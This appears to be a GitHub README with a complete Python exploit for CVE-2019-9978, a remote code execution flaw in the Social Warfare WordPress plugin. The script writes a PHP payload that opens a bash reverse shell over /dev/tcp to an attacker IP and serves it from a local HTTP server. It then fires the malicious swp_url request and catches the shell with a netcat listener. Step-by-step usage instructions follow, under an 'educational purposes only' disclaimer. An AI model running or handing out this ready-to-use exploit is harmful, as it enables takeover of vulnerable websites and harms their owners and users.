The `swp_debug` parameter in `admin-post.php` allows remote attackers to include external files containing malicious PHP code, which are evaluated on the server. By supplying a crafted URL that hosts a reverse shell payload, an attacker can gain command execution.# CVE-2019-9978 - Social Warfare WordPress Plugin RCE
This repository contains a working Python exploit for [CVE-2019-9978](https://nvd.nist.gov/vuln/detail/CVE-2019-9978), a remote code execution vulnerability in the Social Warfare plugin for WordPress (version <= 3.5.2).
## Description
The `swp_debug` parameter in `admin-post.php` allows remote attackers to include external files containing malicious PHP code, which are evaluated on the server. By supplying a crafted URL that hosts a reverse shell payload, an attacker can gain command execution.
## Exploit Features
- Hosts a PHP payload using Python's built-in HTTP server.
- Sends a malicious `swp_url` parameter to trigger RCE.
- Starts a Netcat listener to catch the reverse shell.
- Automatically writes the payload with the correct escaping for successful code execution.
## Requirements
- Python 3.x
- Netcat
- Local DNS resolution for the target domain (e.g. `example.com` mapped to target IP)
## Exploit Code
```python
#!/usr/bin/env python3
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130" # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4447
PAYLOAD_FILE = "payload.txt"
def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")
def start_http_server():
"""Serve payload over HTTP"""
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
httpd.serve_forever()
def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass
def main():
create_payload()
# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start
# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("[-] Interrupted by user.")
```
## Usage
1. Update `ATTACKER_IP` and `LISTEN_PORT` to your machine’s IP and desired port.
2. Ensure the target resolves `example.com` to the correct IP.
3. Run the script:
```bash
python3 exploit.py
```
4. Catch the reverse shell in your listener.
## References
- https://nvd.nist.gov/vuln/detail/CVE-2019-9978
- https://github.com/hash3liZer/CVE-2019-9978
## Disclaimer
This exploit is provided for **educational purposes only**. Do not use it without explicit permission on any system you do not own.
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view